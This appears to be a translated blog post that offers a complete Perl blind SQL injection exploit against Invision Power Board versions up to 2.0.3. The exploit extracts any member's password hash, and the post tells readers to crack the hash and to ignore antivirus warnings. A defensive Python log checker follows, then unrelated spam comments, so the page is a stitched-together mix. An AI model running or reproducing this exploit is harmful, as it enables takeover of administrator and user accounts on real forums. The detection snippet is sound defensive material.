What is an exploit?
In computing, an exploit is a method that takes advantage of a bug or a vulnerability to gain privileges on a computer or to cause a Denial of Service against it.
Here is a Perl exploit with instructions: it is a SQL injection, to be tried on your own Invision Power Board forums, and it reveals the password of any user as an MD5 hash, so the administrator's as well!
Afterwards all you have to do is crack the password with an online password cracker, Passcracking.ru or Milw0rm.com, or download this CrackerMD5 to use locally.
The vulnerable versions range from 1.x to 2.0.3; just compile the code below with ActivePerl and run the program from DOS.
Your antivirus may flag it, but don't worry, go ahead anyway.
Happy testing!
Code:
#!/usr/bin/perl
use IO::Socket;

if (@ARGV < 4) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];
# IPB 2.x stores the hash in member_login_key, IPB 1.x in password
$pass = ($target) ? ('member_login_key') : ('password');
$server =~ s!(http:\/\/)!!;
$request  = 'http://';
$request .= $server;
$request .= $path;
$s_num = 1;   # position of the hash character currently being searched
$|++;
$n = 0;       # request counter, drives the spinner in status()

print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target) ? (' - IPB 2.*') : (' - IPB 1.*'));
print "\r\n";
print "[~] RICERCA PASSWORD IN CORSO ... [|]";

# percent-encode every character of the member id for the cookie
($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

# recover the hash one character at a time: digits first (47..58), then a-f (96..122)
while (1)
{
    if (&found(47,58) == 0) { &found(96,122); }
    $char = $i;
    if ($char == "0")
    {
        if (length($allchar) > 0) {
            print qq{\b\b DONE ]
MEMBER ID : $member_id
};
            print (($target) ? ('MEMBER_LOGIN_KEY : ') : ('PASSWORD : '));
            print $allchar."\r\n";
        }
        else
        {
            print "\b\b IL SITO è FIXATO! ]";
        }
        exit();
    }
    else
    {
        $allchar .= chr($i);
    }
    $s_num++;
}

# narrow the ASCII range of the current character by halving it on each request
sub found($$)
{
    my $fmin = $_[0];
    my $fmax = $_[1];
    if (($fmax-$fmin) < 5) { $i = crack($fmin,$fmax); return $i; }
    $r = int($fmax - ($fmax-$fmin)/2);
    $check = " BETWEEN $r AND $fmax";
    if ( &check($check) ) { &found($r,$fmax); }
    else { &found($fmin,$r); }
}

# once the range is small, test each candidate value directly
sub crack($$)
{
    my $cmin = $_[0];
    my $cmax = $_[1];
    $i = $cmin;
    while ($i < $cmax)
    {
        $crcheck = "=$i";
        if ( &check($crcheck) ) { return $i; }
        $i++;
    }
    $i = 0;
    return $i;
}

# send one autologin request; a "session_id=0" cookie in the reply means the condition held
sub check($)
{
    $n++;
    status();
    $ccheck = $_[0];
    $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
    $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
    $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
    $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    $nmalykh = "%26%231054%3B%26%231081%3B+%26%231088%3B%26%231072%3B%26%231073%3B%26%231086%3B%26%231090%3B%26%231072%3B%26%231077%3B%26%231090%3B%21";
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
    printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
        $path, $server, $cmember_id, $pass_hash1, $cmember_id, $pass_hash2, $pass_hash3, $nmalykh);
    while (<$socket>)
    {
        if (/Set-Cookie: session_id=0;/) { return 1; }
    }
    return 0;
}

sub status()
{
    $status = $n % 5;
    if ($status == 0) { print "\b\b/]"; }
    if ($status == 1) { print "\b\b-]"; }
    if ($status == 2) { print "\b\b\\]"; }
    if ($status == 3) { print "\b\b|]"; }
}

sub usage()
{
    print q(
Invision Power Board v <= 2.0.3 SQL Injection exploit
============================================================
ISTRUZIONI:
************************************************************
ipbexploit.pl [Host] [/cartellaIPB/] [utente] [IPBversione]
[server] -> Host da attaccare
[/folder/] -> Cartella dove è installato IPB
[member_id] -> Numero dell'utente da attaccare
target:
0 -> per versioni 1.x
1 -> per versioni 2.x (fino alla 2.0.3)
Esempio ipbexploit.pl http://www.sitovittima.it /forums/ 1 1
**************************************************************
==============================================================
Tradotto in Italiano Da UnderGround0
About -> underground0@hotmail.it
Programmer: 1dt.w0lf; RST/GHC; http://ghc.ru
);
    exit();
}
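A defender-side check, added here as an example and not part of the original post or of the exploit: the attack above only works because the forum accepted a pass_hash cookie that was not a plain MD5 digest, so a review of autologin requests can flag every pass_hash that does not decode to 32 hex characters and every client issuing bursts of such requests. The Apache log format with the Cookie header appended (%{Cookie}i), the sample lines and the burst threshold are assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample of Apache access-log lines (not real traffic) from a
# LogFormat that appends the Cookie request header via "%{Cookie}i".
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2006:10:00:01 +0100] "GET /forums/index.php?act=Login&CODE=autologin HTTP/1.0" 200 512 "member_id=1; pass_hash=5f4dcc3b5aa765d61d8327deb882cf99"
203.0.113.9 - - [10/Mar/2006:10:00:02 +0100] "GET /forums/index.php?act=Login&CODE=autologin HTTP/1.0" 200 512 "member_id=1; pass_hash=1666%2527%20OR%20(id%3D1%20AND%20ascii(substring(member_login_key%2C1%2C1))%20BETWEEN%2085%20AND%20122)%20/*"
203.0.113.9 - - [10/Mar/2006:10:00:03 +0100] "GET /forums/index.php?act=Login&CODE=autologin HTTP/1.0" 200 512 "member_id=1; pass_hash=1666%2527%20OR%20(id%3D1%20AND%20ascii(substring(member_login_key%2C1%2C1))%20BETWEEN%20103%20AND%20122)%20/*"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ "(?P<cookie>[^"]*)"$')
HEX32 = re.compile(r'^[0-9a-f]{32}$')

def cookies(raw):
    """Split a Cookie header value into a dict; later duplicates win."""
    jar = {}
    for part in raw.split(';'):
        if '=' in part:
            k, v = part.strip().split('=', 1)
            jar[k] = v
    return jar

def pass_hash_is_valid(value):
    """An IPB pass_hash is an MD5 digest: exactly 32 hex characters.
    Decode twice, because the cookie is percent-encoded on the wire and the
    exploit on this page double-encodes the quote as %2527."""
    return bool(HEX32.match(unquote(unquote(value)).lower()))

def analyze(log_text, burst=2):
    """Return (flagged (ip, member_id) pairs, ips with >= burst autologin hits)."""
    flagged, per_ip = [], Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or 'CODE=autologin' not in m.group('req'):
            continue
        jar = cookies(m.group('cookie'))
        per_ip[m.group('ip')] += 1
        if not pass_hash_is_valid(jar.get('pass_hash', '')):
            flagged.append((m.group('ip'), jar.get('member_id')))
    bursty = sorted(ip for ip, n in per_ip.items() if n >= burst)
    return flagged, bursty
```

The burst signal matters on its own: recovering a 32-character hash with the range-halving loop above takes well over a hundred autologin requests for a single member_id, which no real browser produces.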
To get high rankings in Yahoo and MSN is all about links? I can get ranked easier in Google with links,
but the other two I have no clue.
It's the first exploit I've launched!
I can't compile it, it always gives me a ton of syntax errors.
Sorry if I'm posting here,
but do you have any idea of a good chat community?
Regards
——————-
http://www.faceland.it/index.php?option=com_gametrailers&Itemid=34
Maybe I've got the wrong forum,
but could you recommend a great chat?
Regards
Hey Guys,
I am a student (limited budget) and have seen a few offers for free ipods and iphones. Does anyone Know if any if the free IPhone or Ipod offers are actually legit? I don’t want to waste my time filling out a hundred surveys and was hoping to hear from someone who may have had some success with this.
Thanks
@zinymegan: I do not know. It seems not possible and notice this, but I can not guarantee this 100%